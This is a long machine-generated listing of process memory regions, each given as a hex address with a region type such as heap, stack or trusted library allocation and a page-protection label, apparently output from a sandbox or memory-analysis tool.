8B399DE000
stack
page read and write
31D2000
heap
page read and write
60F0000
heap
page read and write
7FF5117AE000
unkown
page readonly
861D000
heap
page read and write
5FC2000
heap
page read and write
A1CD000
heap
page read and write
7A2E000
unkown
page readonly
281A12B0000
trusted library allocation
page read and write
4D00000
unkown
page read and write
869E000
heap
page read and write
7DEE000
stack
page read and write
867D000
heap
page read and write
59BA000
heap
page read and write
3290000
unkown
page readonly
846D000
heap
page read and write
9C7E000
stack
page read and write
7977000
unkown
page readonly
C739000
stack
page read and write
2BD0000
unkown
page read and write
BFCE000
stack
page read and write
7FF9F1880000
trusted library allocation
page read and write
FF1A000
stack
page read and write
7EBA000
unkown
page read and write
A0A6000
heap
page read and write
FF58000
heap
page read and write
E41A000
stack
page read and write
5BEC000
unkown
page read and write
4997000
heap
page read and write
23395013000
heap
page read and write
6041000
heap
page read and write
28187480000
trusted library allocation
page read and write
D63E000
stack
page read and write
9F71000
heap
page read and write
6900000
unkown
page read and write
281A1FAE000
heap
page read and write
7FF9F1680000
trusted library allocation
page read and write
9E87000
heap
page read and write
281A1400000
trusted library allocation
page read and write
A060000
heap
page read and write
1430000
unkown
page readonly
5BBE000
unkown
page read and write
5898000
heap
page read and write
DEE0000
heap
page read and write
2820000
unkown
page readonly
7FFA5B5D7000
unkown
page readonly
5870000
heap
page read and write
83B5000
heap
page read and write
7482000
heap
page read and write
ABBB000
stack
page read and write
281A1420000
trusted library allocation
page read and write
EA9000
unclassified section
page execute and read and write
7FF9F15D3000
trusted library allocation
page execute and read and write
12FE08E0000
trusted library allocation
page read and write
5978000
heap
page read and write
1A5494B9000
heap
page read and write
4F10000
unkown
page read and write
CA83000
unkown
page readonly
A0B1000
heap
page read and write
2ACC000
trusted library allocation
page read and write
FF95000
heap
page read and write
12FE07C0000
trusted library allocation
page read and write
2820000
unkown
page readonly
28236F4D000
heap
page read and write
6900000
unkown
page read and write
7FF51128D000
unkown
page readonly
E87E000
unkown
page read and write
7FF9F1880000
trusted library allocation
page read and write
69A6000
unkown
page read and write
1A563520000
trusted library allocation
page read and write
12FE07C0000
trusted library allocation
page read and write
D73B000
stack
page read and write
FFE1000
heap
page read and write
27E3023A000
heap
page read and write
A58D000
stack
page read and write
463ED3E000
stack
page read and write
2060E59B000
trusted library allocation
page read and write
28236FCB000
heap
page read and write
7FF511531000
unkown
page readonly
26AC6AA4000
heap
page read and write
2339505F000
heap
page read and write
850E000
heap
page read and write
E30C000
stack
page read and write
2F4C000
heap
page read and write
281A1FF0000
heap
page read and write
27E3060B000
heap
page read and write
1A10D0B4000
heap
page read and write
7FF5119EE000
unkown
page readonly
861D000
heap
page read and write
7325000
trusted library allocation
page read and write
1A5492D0000
heap
page read and write
26AC6A1D000
heap
page read and write
E38000
heap
page read and write
1A563840000
trusted library allocation
page read and write
FF20000
heap
page read and write
5962000
heap
page read and write
8B39FBE000
stack
page read and write
1C7AD100000
unkown
page readonly
49E5000
heap
page read and write
E112000
unkown
page read and write
18D542FF000
heap
page read and write
DD0000
heap
page read and write
28251290000
heap
page read and write
59C5000
heap
page read and write
FF97000
heap
page read and write
7FF5115C6000
unkown
page readonly
CF32000
unkown
page readonly
281A1F9A000
heap
page read and write
60F0000
heap
page read and write
E379000
unkown
page read and write
748A000
heap
page read and write
10467000
heap
page read and write
FC7000
heap
page read and write
281A1420000
trusted library allocation
page read and write
26AC106E000
heap
page read and write
12FE0000000
heap
page execute and read and write
5F59000
heap
page read and write
CE77000
unkown
page readonly
1C7AD110000
unkown
page readonly
E174000
unkown
page read and write
7FF9F1840000
trusted library allocation
page read and write
84E2000
heap
page read and write
7FF511327000
unkown
page readonly
10C8B000
stack
page read and write
E38000
heap
page read and write
7540000
unkown
page readonly
4CB0000
unkown
page read and write
7FF511930000
unkown
page readonly
5F7E000
heap
page read and write
5ACC000
stack
page read and write
DF55000
heap
page read and write
85E4000
heap
page read and write
7DF419791000
trusted library allocation
page execute read
18D54FB0000
trusted library allocation
page read and write
CEAF000
unkown
page readonly
E10000
trusted library allocation
page read and write
7FF5119F8000
unkown
page readonly
8584000
heap
page read and write
281891CD000
trusted library allocation
page read and write
CFB000
trusted library allocation
page read and write
9F1F000
heap
page read and write
7FF9F1690000
trusted library allocation
page execute and read and write
463E9FF000
stack
page read and write
85DE000
heap
page read and write
CF2E000
unkown
page readonly
11A8D000
stack
page read and write
CA6E000
unkown
page readonly
1A10D0A6000
heap
page read and write
7DF4197A1000
trusted library allocation
page execute read
C80A000
stack
page read and write
590B000
heap
page read and write
28250FEE000
heap
page read and write
E70E000
stack
page read and write
48A1000
unkown
page read and write
2060D9A0000
trusted library allocation
page read and write
9EB9000
heap
page read and write
7FFA5B56E000
unkown
page read and write
E53C000
unkown
page read and write
1C7C7450000
trusted library allocation
page read and write
2060D9E0000
trusted library allocation
page read and write
9D7F000
stack
page read and write
DF40000
heap
page read and write
E0D0000
unkown
page read and write
8602000
heap
page read and write
13D0000
heap
page read and write
B8CA000
stack
page read and write
28236F46000
heap
page read and write
E3B4000
unkown
page read and write
2060BF60000
unkown
page readonly
81AB000
unkown
page read and write
281895D7000
trusted library allocation
page read and write
D550000
heap
page read and write
4880000
trusted library allocation
page read and write
1A563520000
trusted library allocation
page read and write
28238F00000
trusted library allocation
page read and write
A10000
heap
page read and write
206260C0000
trusted library allocation
page read and write
815A000
unkown
page read and write
DF74000
heap
page read and write
7FFA5B565000
unkown
page read and write
7FF5112F3000
unkown
page readonly
4750000
unkown
page read and write
588C000
heap
page read and write
281A1410000
trusted library allocation
page read and write
D3BA000
stack
page read and write
7FF5118BE000
unkown
page readonly
C7BC000
stack
page read and write
12FC8F08000
trusted library allocation
page read and write
4AB9000
heap
page read and write
12FE0850000
trusted library allocation
page read and write
85E4000
heap
page read and write
7FF511AB3000
unkown
page readonly
9F77000
heap
page read and write
7FF51199B000
unkown
page readonly
FF54000
heap
page read and write
12FC6090000
heap
page read and write
96FD000
stack
page read and write
CCFD000
unkown
page readonly
4910000
heap
page read and write
1C7AF0E0000
heap
page read and write
18D54240000
heap
page read and write
E68C000
stack
page read and write
7ECC000
unkown
page read and write
858C000
stack
page read and write
E121000
unkown
page read and write
1220000
heap
page read and write
2339505D000
heap
page read and write
E381000
unkown
page read and write
1200000
heap
page read and write
C9D3000
unkown
page readonly
2062607C000
heap
page read and write
7F91000
unkown
page read and write
2060C060000
heap
page read and write
1A10B355000
heap
page read and write
4710000
unkown
page read and write
9EA4000
heap
page read and write
1A54B230000
heap
page execute and read and write
CE7E000
unkown
page readonly
2061DF80000
trusted library allocation
page read and write
D599000
heap
page read and write
1A10D0B4000
heap
page read and write
A0C7000
heap
page read and write
9F2F000
heap
page read and write
7FF5119A1000
unkown
page readonly
7FF5118C7000
unkown
page readonly
8530000
heap
page read and write
12FE0950000
trusted library allocation
page read and write
281A1410000
trusted library allocation
page read and write
10D8E000
stack
page read and write
E18E000
stack
page read and write
5D4E000
stack
page read and write
28251810000
trusted library allocation
page read and write
2800000
unkown
page read and write
50CE000
stack
page read and write
B349000
stack
page read and write
9E9F000
heap
page read and write
1494000
heap
page read and write
D493000
trusted library allocation
page read and write
12FE0180000
trusted library allocation
page read and write
1C7AD1F8000
heap
page read and write
7198000
heap
page read and write
28189109000
trusted library allocation
page read and write
7FF5114B9000
unkown
page readonly
B050000
unkown
page readonly
12FC6110000
trusted library allocation
page read and write
26AC6860000
trusted library allocation
page read and write
85BD000
heap
page read and write
CCFD000
unkown
page readonly
7D69000
unkown
page readonly
7FF511643000
unkown
page readonly
2016A002000
heap
page read and write
1C7AFC9E000
trusted library allocation
page read and write
9E00000
heap
page read and write
1494000
heap
page read and write
A20000
unkown
page read and write
85D3000
heap
page read and write
540E000
stack
page read and write
7DF4197A1000
trusted library allocation
page execute read
58FC000
heap
page read and write
5BD3000
unkown
page read and write
6099000
heap
page read and write
F04000
heap
page read and write
86A8000
heap
page read and write
A179000
heap
page read and write
1A563453000
heap
page read and write
FFCE000
heap
page read and write
26AC10AB000
heap
page read and write
D13C000
unkown
page readonly
20626076000
heap
page read and write
26AC6738000
trusted library allocation
page read and write
2CA7000
stack
page read and write
7FF9F18E0000
trusted library allocation
page read and write
18D54308000
heap
page read and write
A0C4000
heap
page read and write
18D55260000
trusted library allocation
page read and write
7FF9F1796000
trusted library allocation
page read and write
94FD000
stack
page read and write
D59D000
heap
page read and write
7FF9F1670000
trusted library allocation
page read and write
A1EF000
heap
page read and write
E8A000
heap
page read and write
844F000
heap
page read and write
85E4000
heap
page read and write
12FC79AA000
heap
page read and write
4870000
trusted library allocation
page read and write
7FF5114C9000
unkown
page readonly
7FF9F17C0000
trusted library allocation
page read and write
1A10B0C5000
heap
page read and write
A168000
heap
page read and write
830C000
heap
page read and write
20626050000
heap
page read and write
12FE0242000
heap
page read and write
1C7AD0D5000
heap
page read and write
9EB5000
heap
page read and write
81B0000
unkown
page read and write
5BCF000
unkown
page read and write
60F8000
heap
page read and write
282510C0000
trusted library allocation
page read and write
9FEA000
heap
page read and write
12FE01C3000
heap
page read and write
A17D000
heap
page read and write
585A000
heap
page read and write
7FF511954000
unkown
page readonly
69B7000
unkown
page read and write
7FF511552000
unkown
page readonly
DF47000
heap
page read and write
8517000
heap
page read and write
A15E000
heap
page read and write
5902000
heap
page read and write
A1F7000
heap
page read and write
5430000
unkown
page readonly
51B9000
unkown
page read and write
6991000
unkown
page read and write
7FFA5B5D7000
unkown
page readonly
49A0000
unkown
page read and write
F50000
unkown
page readonly
81DB000
unkown
page read and write
7E3F000
stack
page read and write
CF35000
unkown
page readonly
18D5433B000
heap
page read and write
5999000
heap
page read and write
281A1400000
trusted library allocation
page read and write
868F000
heap
page read and write
B24E000
stack
page read and write
69AF000
unkown
page read and write
CA40000
unkown
page readonly
1E4A93ED000
heap
page read and write
2F42000
unkown
page read and write
AABF000
stack
page read and write
7A4F000
unkown
page readonly
5300000
unkown
page read and write
31A0000
heap
page read and write
A1DC000
heap
page read and write
E6EC000
unkown
page read and write
103FD000
heap
page read and write
8586000
heap
page read and write
786E000
stack
page read and write
9EE5000
heap
page read and write
5F8A000
heap
page read and write
8534000
heap
page read and write
12FE0180000
trusted library allocation
page read and write
7FF511A2F000
unkown
page readonly
28187270000
heap
page read and write
154FFBE000
stack
page read and write
A0D2000
heap
page read and write
7FF5114F0000
unkown
page readonly
7FF511858000
unkown
page readonly
48C0000
unkown
page read and write
A0BD000
heap
page read and write
5F8A000
heap
page read and write
2D8E000
stack
page read and write
8408000
heap
page read and write
7FF511645000
unkown
page readonly
C938000
stack
page read and write
8640000
heap
page read and write
12FC7B30000
trusted library allocation
page read and write
7AE2000
unkown
page readonly
E31A000
stack
page read and write
D56A000
heap
page read and write
282510A0000
trusted library allocation
page read and write
E139000
unkown
page read and write
7FF5117CA000
unkown
page readonly
855D000
heap
page read and write
A1EA000
heap
page read and write
2F84000
heap
page read and write
7FF511617000
unkown
page readonly
1A563551000
heap
page read and write
7FF51152D000
unkown
page readonly
328B000
stack
page read and write
1550C8E000
stack
page read and write
E534000
unkown
page read and write
8517000
heap
page read and write
7FF511ABD000
unkown
page readonly
7FF9F1680000
trusted library allocation
page execute and read and write
6051000
heap
page read and write
9EB3000
heap
page read and write
9EB7000
heap
page read and write
4DDB2F7000
stack
page read and write
85AD000
heap
page read and write
5BEC000
unkown
page read and write
7FF51198E000
unkown
page readonly
7FF511674000
unkown
page readonly
D247000
unkown
page readonly
E1A9000
unkown
page read and write
A164000
heap
page read and write
E68000
heap
page read and write
A15F000
heap
page read and write
937C000
stack
page read and write
346A000
stack
page read and write
815C000
unkown
page read and write
7FF9F1666000
trusted library allocation
page read and write
3460000
unkown
page readonly
1020000
heap
page read and write
D9BC000
stack
page read and write
57F7000
heap
page read and write
83EA000
heap
page read and write
6FF9000
stack
page read and write
463EBBA000
stack
page read and write
48D0000
unkown
page read and write
A095000
heap
page read and write
587E000
heap
page read and write
2F84000
heap
page read and write
7ED8000
unkown
page read and write
320A000
stack
page read and write
1A563521000
trusted library allocation
page read and write
1039B000
heap
page read and write
2EB3000
heap
page read and write
9E99000
heap
page read and write
28238F00000
trusted library allocation
page read and write
CFFC000
unkown
page readonly
85E4000
heap
page read and write
32B0000
unkown
page readonly
1E4A7030000
heap
page read and write
51C6000
unkown
page read and write
723FDF7000
stack
page read and write
9F06000
heap
page read and write
1A10D0C5000
heap
page read and write
D73B000
stack
page read and write
10B8C000
stack
page read and write
7D47000
unkown
page readonly
7FF9F18D0000
trusted library allocation
page read and write
1C7BF161000
trusted library allocation
page read and write
20626271000
heap
page read and write
C9C2000
unkown
page readonly
589C000
heap
page read and write
1010000
unkown
page read and write
E8A000
heap
page read and write
9C7E000
stack
page read and write
1A10B0C4000
heap
page read and write
85DF000
heap
page read and write
31D0000
heap
page read and write
5100000
unkown
page readonly
E536000
unkown
page read and write
B14B000
stack
page read and write
2818728C000
heap
page read and write
EB0F000
stack
page read and write
A27E000
stack
page read and write
7FF9F1960000
trusted library allocation
page read and write
59AA000
heap
page read and write
9FEA000
heap
page read and write
DF74000
heap
page read and write
DE7000
heap
page read and write
3183000
stack
page read and write
D113000
unkown
page readonly
7ECA000
unkown
page read and write
7BAC000
unkown
page readonly
EED4000
unkown
page read and write
5BCF000
unkown
page read and write
6AFA000
unkown
page read and write
6AFA000
unkown
page read and write
2060DA30000
heap
page execute and read and write
D8BC000
stack
page read and write
7DF425C30000
unkown
page readonly
281871A0000
heap
page read and write
D18E000
unkown
page readonly
320A000
stack
page read and write
84F4000
heap
page read and write
5F8A000
heap
page read and write
1C7C75C0000
heap
page read and write
11D0000
unkown
page readonly
5962000
heap
page read and write
3480000
unkown
page readonly
7FF9F1800000
trusted library allocation
page read and write
12FE0181000
trusted library allocation
page read and write
7FF511A0C000
unkown
page readonly
7FF511492000
unkown
page readonly
DB0000
heap
page read and write
3107000
stack
page read and write
7FF9F17D0000
trusted library allocation
page read and write
7FF511501000
unkown
page readonly
9EB0000
heap
page read and write
4AFB000
heap
page read and write
5389000
stack
page read and write
597B000
heap
page read and write
7FF511962000
unkown
page readonly
85A7000
heap
page read and write
95FD000
stack
page read and write
51C8000
unkown
page read and write
E20000
unkown
page read and write
7FF51156E000
unkown
page readonly
8601000
heap
page read and write
49A0000
heap
page read and write
5AF6000
stack
page read and write
8517000
heap
page read and write
12FC7EE1000
trusted library allocation
page read and write
E10B000
unkown
page read and write
4720000
unkown
page read and write
816D000
stack
page read and write
CFD4000
unkown
page readonly
A0A3000
heap
page read and write
C90B000
stack
page read and write
5FD4000
heap
page read and write
7FF5119C1000
unkown
page readonly
1E4A942F000
heap
page read and write
D7BB000
stack
page read and write
8590000
heap
page read and write
86A8000
heap
page read and write
7FF9F1920000
trusted library allocation
page read and write
10F8D000
unkown
page read and write
7FF511464000
unkown
page readonly
8364000
heap
page read and write
18D54325000
heap
page read and write
A62BAFB000
stack
page read and write
5FCC000
stack
page read and write
31B3000
heap
page read and write
5C85000
unkown
page read and write
85BD000
heap
page read and write
E4A3000
unkown
page read and write
18D54326000
heap
page read and write
2BB0000
unkown
page readonly
7FF511AA6000
unkown
page readonly
26AC2001000
trusted library allocation
page read and write
69AE000
stack
page read and write
A187000
heap
page read and write
28251290000
heap
page read and write
E554000
unkown
page read and write
9AFA000
stack
page read and write
2FA3000
unkown
page read and write
D0D5000
unkown
page readonly
494E000
heap
page read and write
2C89000
stack
page read and write
D3C0000
system
page execute and read and write
D584000
heap
page read and write
D18E000
unkown
page readonly
D70000
heap
page read and write
E59C000
stack
page read and write
28236F00000
trusted library allocation
page read and write
7FF9F1910000
trusted library allocation
page read and write
8601000
heap
page read and write
5BEC000
unkown
page read and write
281A1440000
heap
page read and write
CF4F000
unkown
page readonly
7FF5116C5000
unkown
page readonly
7FF9F1670000
trusted library allocation
page execute and read and write
23395A02000
trusted library allocation
page read and write
7480000
heap
page read and write
1C7C7480000
trusted library allocation
page read and write
1C7C75B0000
heap
page read and write
7FF511743000
unkown
page readonly
59AF000
heap
page read and write
D6BB000
stack
page read and write
9F7D000
heap
page read and write
5AF6000
stack
page read and write
50CE000
stack
page read and write
D1F5000
unkown
page readonly
A068000
heap
page read and write
699D000
unkown
page read and write
82F5000
heap
page read and write
4780000
unkown
page read and write
6C7D000
stack
page read and write
28251210000
heap
page read and write
7FF9F1780000
trusted library allocation
page execute and read and write
318C000
stack
page read and write
584D000
heap
page read and write
1C7AFC9B000
trusted library allocation
page read and write
997B000
stack
page read and write
596E000
heap
page read and write
E6E9000
unkown
page read and write
786E000
stack
page read and write
3183000
stack
page read and write
5100000
unkown
page readonly
4870000
trusted library allocation
page read and write
7FF51156E000
unkown
page readonly
DC3C000
stack
page read and write
84BC000
heap
page read and write
7FF511320000
unkown
page readonly
18D54326000
heap
page read and write
7FF5116E7000
unkown
page readonly
A03C000
heap
page read and write
EE7000
heap
page read and write
7FF9F17B0000
trusted library allocation
page execute and read and write
281A1401000
trusted library allocation
page read and write
ADD0000
unkown
page read and write
94FD000
stack
page read and write
2CCDD8E000
stack
page read and write
CF47000
unkown
page readonly
957D000
stack
page read and write
7FF511514000
unkown
page readonly
4BE9000
stack
page read and write
26AC6A51000
heap
page read and write
281990B1000
trusted library allocation
page read and write
28187230000
heap
page read and write
10A4B000
stack
page read and write
DD0000
heap
page read and write
7D2C000
unkown
page readonly
937C000
stack
page read and write
90FD000
stack
page read and write
A6BB000
stack
page read and write
A5BE000
stack
page read and write
551D000
stack
page read and write
A27E000
stack
page read and write
1020000
unkown
page readonly
7FF5112A0000
unkown
page readonly
28248F61000
trusted library allocation
page read and write
7FFA5BCFA000
unkown
page read and write
12FE0246000
heap
page read and write
D599000
heap
page read and write
7FF511906000
unkown
page readonly
1E4A9249000
heap
page read and write
58A7000
heap
page read and write
1A54B8C0000
trusted library allocation
page read and write
2E8C000
stack
page read and write
2EDC000
heap
page read and write
7C13000
unkown
page readonly
8574000
heap
page read and write
DF47000
heap
page read and write
E39F000
unkown
page read and write
DF5A000
heap
page read and write
7D72000
unkown
page readonly
1025000
heap
page read and write
D59D000
heap
page read and write
CA40000
unkown
page readonly
9F71000
heap
page read and write
83A6000
heap
page read and write
1A10CB9D000
heap
page read and write
2CCE2FA000
stack
page read and write
1128E000
unkown
page read and write
7FF9F1890000
trusted library allocation
page read and write
1E4A7405000
heap
page read and write
7FF9F1870000
trusted library allocation
page read and write
4C49000
stack
page read and write
69B1000
unkown
page read and write
A1D3000
heap
page read and write
869E000
heap
page read and write
281A12C0000
heap
page execute and read and write
27E3023E000
unkown
page read and write
4A54000
heap
page read and write
7FF511788000
unkown
page readonly
7DF419791000
trusted library allocation
page execute read
7D40000
unkown
page readonly
84EA000
heap
page read and write
CE85000
unkown
page readonly
7FF9F15C3000
trusted library allocation
page execute and read and write
85D2000
heap
page read and write
A1EA000
heap
page read and write
28251880000
trusted library allocation
page read and write
85BE000
heap
page read and write
8362000
heap
page read and write
69AD000
unkown
page read and write
E199000
unkown
page read and write
27E30238000
heap
page read and write
6075000
heap
page read and write
28187357000
heap
page read and write
8164000
unkown
page read and write
9E85000
heap
page read and write
FF8A000
heap
page read and write
FDC52B5000
stack
page read and write
FDC670E000
stack
page read and write
834F000
heap
page read and write
12FE07B0000
trusted library section
page read and write
103B7000
heap
page read and write
51A0000
unkown
page read and write
CFE2000
unkown
page readonly
7FF9F15E3000
trusted library allocation
page read and write
D50000
heap
page read and write
3059000
stack
page read and write
5900000
heap
page read and write
7A4F000
unkown
page readonly
2BB0000
unkown
page readonly
7D72000
unkown
page readonly
18D54309000
heap
page read and write
108D0000
heap
page read and write
A43C000
stack
page read and write
6BFE000
stack
page read and write
CA6B000
unkown
page readonly
338A000
stack
page read and write
7FF511734000
unkown
page readonly
E33E000
unkown
page read and write
6084000
heap
page read and write
1020000
unkown
page readonly
7FF9F18B0000
trusted library allocation
page read and write
1A563840000
trusted library allocation
page read and write
11A5F000
stack
page read and write
60DC000
heap
page read and write
727B000
stack
page read and write
6045000
heap
page read and write
D581000
heap
page read and write
9FB7000
heap
page read and write
1220000
heap
page read and write
4CB0000
unkown
page read and write
D1B9000
unkown
page readonly
281A201A000
heap
page read and write
28251760000
trusted library section
page read and write
7FF9F1940000
trusted library allocation
page read and write
520E000
stack
page read and write
28238F40000
trusted library allocation
page read and write
12FE08F0000
trusted library allocation
page read and write
FF89000
heap
page read and write
7FF9F15AD000
trusted library allocation
page execute and read and write
855B000
heap
page read and write
96FD000
stack
page read and write
32F0000
unkown
page readonly
1E4A9562000
heap
page read and write
18D55290000
trusted library allocation
page read and write
FDC53BE000
stack
page read and write
9AFA000
stack
page read and write
7FF5118CF000
unkown
page readonly
7475000
trusted library allocation
page read and write
32F0000
unkown
page readonly
7FF5114A7000
unkown
page readonly
7FF511303000
unkown
page readonly
282518F0000
trusted library allocation
page read and write
FF8C000
heap
page read and write
9C7E000
stack
page read and write
473A000
unkown
page read and write
7FF511981000
unkown
page readonly
7FF9F18A0000
trusted library allocation
page read and write
EC4A000
heap
page read and write
60D6000
heap
page read and write
7FF511248000
unkown
page readonly
1A54B251000
trusted library allocation
page read and write
60CE000
stack
page read and write
9F7D000
heap
page read and write
58CA000
heap
page read and write
F699000
stack
page read and write
9F73000
heap
page read and write
4CF0000
unkown
page read and write
A1B9000
heap
page read and write
281A1F96000
heap
page read and write
11D117E000
stack
page read and write
E340000
unkown
page read and write
46F0000
unkown
page read and write
D7BB000
stack
page read and write
8603000
heap
page read and write
1E4A9631000
heap
page read and write
CF5F000
unkown
page readonly
1A563860000
trusted library allocation
page read and write
E8A000
heap
page read and write
1225000
heap
page read and write
5981000
heap
page read and write
A58D000
stack
page read and write
4997000
heap
page read and write
51C8000
unkown
page read and write
852B000
heap
page read and write
5DCE000
stack
page read and write
1E4A8C3D000
heap
page read and write
2F6F000
heap
page read and write
2060BF20000
heap
page read and write
7FF511750000
unkown
page readonly
970000
heap
page read and write
28238F10000
trusted library allocation
page read and write
9EA4000
heap
page read and write
7FF9F1792000
trusted library allocation
page read and write
4760000
unkown
page read and write
CF4F000
unkown
page readonly
796A000
stack
page read and write
7FF9F15A3000
trusted library allocation
page execute and read and write
7FFA5B56C000
unkown
page read and write
A1EA000
heap
page read and write
30FD000
heap
page read and write
1A54B8BB000
trusted library allocation
page read and write
FC4000
heap
page read and write
E0C000
heap
page read and write
7FF9F17E0000
trusted library allocation
page read and write
A0C5000
heap
page read and write
7FF9F1800000
trusted library allocation
page read and write
281A1FE8000
heap
page read and write
9F16000
heap
page read and write
8525000
heap
page read and write
ADD0000
unkown
page read and write
A1DA000
heap
page read and write
A059000
heap
page read and write
3197000
heap
page read and write
8B39F7E000
stack
page read and write
18D54339000
heap
page read and write
2840000
heap
page read and write
8173000
unkown
page read and write
28187466000
heap
page read and write
E194000
unkown
page read and write
28189090000
trusted library allocation
page read and write
7DF45EE41000
trusted library allocation
page execute read
1188B000
stack
page read and write
A17D000
heap
page read and write
A169000
heap
page read and write
154F6E5000
stack
page read and write
7FF51167C000
unkown
page readonly
8602000
heap
page read and write
1C7C72D3000
heap
page read and write
85E4000
heap
page read and write
A62BC77000
stack
page read and write
86A8000
heap
page read and write
1039D000
heap
page read and write
7FF511A2F000
unkown
page readonly
7FF9F15D3000
trusted library allocation
page execute and read and write
2F84000
heap
page read and write
7FF511703000
unkown
page readonly
7FF511847000
unkown
page readonly
9EDE000
heap
page read and write
9F06000
heap
page read and write
7DF419781000
trusted library allocation
page execute read
1039B000
heap
page read and write
103C4000
heap
page read and write
A0C7000
heap
page read and write
5900000
heap
page read and write
18D54335000
heap
page read and write
859E000
heap
page read and write
E29C000
stack
page read and write
1C7AFF01000
trusted library allocation
page read and write
CEF1000
unkown
page readonly
A168000
heap
page read and write
58FE000
heap
page read and write
D574000
heap
page read and write
28187514000
trusted library allocation
page read and write
7FF51152D000
unkown
page readonly
9F6D000
heap
page read and write
15629446000
heap
page read and write
28251890000
trusted library allocation
page read and write
12FE01B0000
trusted library allocation
page read and write
5F20000
heap
page read and write
12FE0860000
trusted library allocation
page read and write
850A000
stack
page read and write
5FC2000
heap
page read and write
7FF9F18D0000
trusted library allocation
page read and write
85F6000
heap
page read and write
7FF9F1830000
trusted library allocation
page read and write
9F2E000
heap
page read and write
7FF511758000
unkown
page readonly
D249000
unkown
page readonly
7FF511A11000
unkown
page readonly
4720000
trusted library section
page read and write
7FFF000
unkown
page read and write
7FF9F17C0000
trusted library allocation
page execute and read and write
7FF51160D000
unkown
page readonly
1C7AD1C4000
heap
page read and write
8692000
heap
page read and write
28189101000
trusted library allocation
page read and write
69BF000
unkown
page read and write
851C000
heap
page read and write
7FF5119B6000
unkown
page readonly
281890CA000
trusted library allocation
page read and write
335B000
stack
page read and write
A09C000
heap
page read and write
A1A6000
heap
page read and write
5981000
heap
page read and write
D1CC000
unkown
page readonly
910000
unkown
page read and write
101D000
stack
page read and write
A19E000
heap
page read and write
E37A000
unkown
page read and write
11D10F9000
stack
page read and write
4880000
unkown
page read and write
9FEA000
heap
page read and write
48C0000
unkown
page read and write
AC5000
stack
page read and write
4A50000
heap
page read and write
5580000
unkown
page read and write
E788000
stack
page read and write
7FF9F17C0000
trusted library allocation
page read and write
580D000
heap
page read and write
1C7AF301000
trusted library allocation
page read and write
103B7000
heap
page read and write
7FF5115AF000
unkown
page readonly
D063000
unkown
page readonly
E00B000
stack
page read and write
4870000
trusted library allocation
page read and write
12FE0190000
trusted library allocation
page read and write
9C5000
stack
page read and write
51BC000
unkown
page read and write
9F77000
heap
page read and write
28238F10000
trusted library allocation
page read and write
7FF511590000
unkown
page readonly
7FF5118EF000
unkown
page readonly
70FB000
stack
page read and write
281891BB000
trusted library allocation
page read and write
93F9000
stack
page read and write
9E83000
heap
page read and write
2F18000
unkown
page read and write
60ED000
heap
page read and write
12FC5FA6000
heap
page read and write
DF74000
heap
page read and write
7330000
trusted library allocation
page read and write
28251850000
trusted library allocation
page read and write
FFDF000
heap
page read and write
2CCF0CF000
stack
page read and write
49C6000
unkown
page read and write
A27E000
stack
page read and write
281A202C000
heap
page read and write
206260C0000
trusted library allocation
page read and write
D56A000
heap
page read and write
9BFE000
stack
page read and write
B6CE000
stack
page read and write
4CF0000
unkown
page read and write
7FF511957000
unkown
page readonly
7ED8000
unkown
page read and write
E0C000
heap
page read and write
3460000
heap
page read and write
C88E000
stack
page read and write
596E000
heap
page read and write
8622000
heap
page read and write
836E000
heap
page read and write
602F000
heap
page read and write
85CF000
heap
page read and write
83D7000
heap
page read and write
28189090000
trusted library allocation
page read and write
154FCF9000
stack
page read and write
7FF9F1800000
trusted library allocation
page read and write
5160000
unkown
page read and write
7FF5114C3000
unkown
page readonly
69AB000
unkown
page read and write
51C6000
unkown
page read and write
CF5F000
unkown
page readonly
1C7C7440000
trusted library allocation
page read and write
27E301F0000
heap
page read and write
DB8000
heap
page read and write
7FFA59351000
unkown
page execute read
1120000
heap
page read and write
28251770000
trusted library allocation
page read and write
5978000
heap
page read and write
2840000
heap
page read and write
1020000
unkown
page readonly
12FDFF50000
heap
page read and write
EDD2000
unkown
page read and write
4DDB1FB000
stack
page read and write
D165000
unkown
page readonly
28187510000
trusted library allocation
page read and write
23395000000
heap
page read and write
AF4B000
stack
page read and write
86A8000
heap
page read and write
2BB0000
unkown
page readonly
8378000
heap
page read and write
49E7000
unkown
page read and write
D63E000
stack
page read and write
4A0B000
unkown
page read and write
D197000
unkown
page readonly
83A6000
heap
page read and write
4740000
unkown
page read and write
27E3026B000
unkown
page read and write
206264E0000
heap
page read and write
E31A000
stack
page read and write
85F6000
heap
page read and write
D183000
unkown
page readonly
58A7000
heap
page read and write
26D1785000
stack
page read and write
310B000
stack
page read and write
85A9000
heap
page read and write
26AC0F20000
heap
page read and write
57D9000
heap
page read and write
2F18000
unkown
page read and write
4870000
trusted library allocation
page read and write
12FE0180000
trusted library allocation
page read and write
7FF5119C1000
unkown
page readonly
354A000
stack
page read and write
F699000
stack
page read and write
8368000
heap
page read and write
7FF511514000
unkown
page readonly
7FF9F1772000
trusted library allocation
page read and write
4F8BAFE000
stack
page read and write
2E8E000
stack
page read and write
FFE1000
heap
page read and write
671C000
stack
page read and write
599D000
heap
page read and write
E39E000
stack
page read and write
5198000
unkown
page read and write
60F8000
heap
page read and write
ABBB000
stack
page read and write
7FF511820000
unkown
page readonly
85AD000
heap
page read and write
A0B8000
heap
page read and write
7303000
trusted library allocation
page read and write
7FF9F1850000
trusted library allocation
page read and write
A53D000
stack
page read and write
D272000
unkown
page readonly
2825129C000
heap
page read and write
5300000
unkown
page read and write
595B000
heap
page read and write
4FC0000
unkown
page readonly
7460000
trusted library allocation
page read and write
112B000
heap
page read and write
518B000
stack
page read and write
6720000
trusted library allocation
page read and write
7EC2000
unkown
page read and write
602F000
heap
page read and write
7D49000
unkown
page readonly
8358000
heap
page read and write
C9BE000
unkown
page readonly
2BD0000
unkown
page read and write
12FE01A0000
trusted library allocation
page read and write
85F6000
heap
page read and write
719A000
heap
page read and write
60F8000
heap
page read and write
499E000
heap
page read and write
2F85000
unkown
page read and write
A06B000
heap
page read and write
7FF9F15A4000
trusted library allocation
page read and write
28251002000
heap
page read and write
A6BB000
stack
page read and write
59BF000
heap
page read and write
7FFA5B3D0000
unkown
page readonly
7FFA5B56A000
unkown
page read and write
7FF9F15D3000
trusted library allocation
page execute and read and write
599D000
heap
page read and write
7FF5115D2000
unkown
page readonly
CF35000
unkown
page readonly
539D000
unkown
page read and write
7ED4000
unkown
page read and write
2060C14A000
heap
page read and write
7E82000
unkown
page read and write
3480000
unkown
page readonly
2E90000
heap
page read and write
7FFA594E5000
unkown
page read and write
FF91000
heap
page read and write
C83F000
stack
page read and write
2A30000
unkown
page read and write
471A000
unkown
page read and write
282393B7000
trusted library allocation
page read and write
1494000
heap
page read and write
